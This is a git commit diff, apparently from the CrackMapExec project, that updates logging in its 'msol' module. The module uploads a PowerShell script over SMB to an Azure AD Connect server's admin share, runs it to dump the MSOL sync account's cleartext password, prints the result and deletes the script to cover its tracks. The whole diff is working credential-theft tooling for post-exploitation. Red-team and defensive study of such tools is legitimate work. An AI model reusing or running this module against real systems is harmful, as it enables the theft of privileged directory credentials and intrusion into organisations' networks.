update msol module logging

main
Marshall Hallenbeck 2023-04-05 23:00:01 -04:00
parent 083550846a
commit edb85f382e
1 changed files with 50 additions and 41 deletions

View File

@ -1,79 +1,88 @@
# MSOL module for CME # MSOL module for CME
# Author of the module : https://twitter.com/Daahtk # Author of the module : https://twitter.com/Daahtk
# Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/ # Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
from base64 import b64decode
from sys import exit from sys import exit
from os import path from os import path
from cme.helpers.powershell import get_ps_script
class CMEModule: class CMEModule:
name = "msol"
description = "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
name = 'msol' def __init__(self, context=None, module_options=None):
description = 'Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server' self.use_embedded = None
supported_protocols = ['smb'] self.MSOL_PS1 = None
opsec_safe = True self.msol_embedded = None
multiple_hosts = True self.cmd = None
self.msolmdl = None
self.msol = None
self.tmp_share = None
self.share = None
self.tmp_dir = None
self.context = context
self.module_options = module_options
def options(self, context, module_options): def options(self, context, module_options):
''' """
MSOL_PS1 // Path to the msol binary on your computer MSOL_PS1 // Path to the msol binary on your computer
''' """
self.tmp_dir = "C:\\Windows\\Temp\\"
self.share = "C$"
self.tmp_share = self.tmp_dir.split(":")[1]
self.msol = "msol.ps1"
self.use_embedded = True
self.msolmdl = self.cmd = ""
self.tmp_dir = "C:\\Windows\\Temp\\" with open(get_ps_script('msol_dump/msol_dump.ps1'), 'r') as msolsc:
self.share = "C$" self.msol_embedded = msolsc.read()
self.tmp_share = self.tmp_dir.split(":")[1]
self.msol = "msol.ps1"
self.useembeded = True
self.msolmdl = self.cmd = ""
with open(get_ps_script('msol_dump/msol_dump.ps1'), 'r') as msolsc: if "MSOL_PS1" in module_options:
self.msol_embedded = msolsc.read() self.MSOL_PS1 = module_options["MSOL_PS1"]
self.use_embedded = False
if "MSOL_PS1" in module_options: def exec_script(self, _, connection):
self.MSOL_PS1 = module_options["MSOL_PS1"]
self.useembeded = False
def execscript(self, _, connection):
command = f"C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe {self.tmp_dir}msol.ps1" command = f"C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe {self.tmp_dir}msol.ps1"
return connection.execute(command, True) return connection.execute(command, True)
def on_admin_login(self, context, connection):
if self.useembeded: def on_admin_login(self, context, connection):
if self.use_embedded:
file_to_upload = "/tmp/msol.ps1" file_to_upload = "/tmp/msol.ps1"
with open(file_to_upload, 'w') as msol: with open(file_to_upload, 'w') as msol:
msol.write(self.msol_embedded) msol.write(self.msol_embedded)
else: else:
if path.isfile(self.MSOL_PS1): if path.isfile(self.MSOL_PS1):
file_to_upload = self.MSOL_PS1 file_to_upload = self.MSOL_PS1
else: else:
context.log.error(f"Cannot open {self.MSOL_PS1}") context.log.fail(f"Cannot open {self.MSOL_PS1}")
exit(1) exit(1)
context.log.display(f"Uploading {self.msol}") context.log.display(f"Uploading {self.msol}")
with open(file_to_upload, 'rb') as msol: with open(file_to_upload, 'rb') as msol:
try: try:
connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read) connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read)
context.log.success(f"Msol script successfully uploaded") context.log.success(f"Msol script successfully uploaded")
except Exception as e: except Exception as e:
context.log.error(f"Error writing file to share {self.tmp_share}: {e}") context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
return return
try: try:
if self.cmd == "": if self.cmd == "":
context.log.display(f"Executing the script") context.log.display(f"Executing the script")
p = self.execscript(context, connection) p = self.exec_script(context, connection)
for line in p.splitlines(): for line in p.splitlines():
p1, p2 = line.split(" ", 1) p1, p2 = line.split(" ", 1)
context.log.highlight(f"{p1} {p2}") context.log.highlight(f"{p1} {p2}")
else : else:
context.log.error(f"Script Execution Impossible") context.log.fail(f"Script Execution Impossible")
except Exception as e: except Exception as e:
context.log.error(f"Error runing command: {e}") context.log.fail(f"Error running command: {e}")
finally: finally:
try: try:
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}") connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}")
context.log.success(f"Msol script successfully deleted") context.log.success(f"Msol script successfully deleted")
except Exception as e: except Exception as e:
context.log.error(f"Error deleting msol script on {self.share}: {e}") context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}")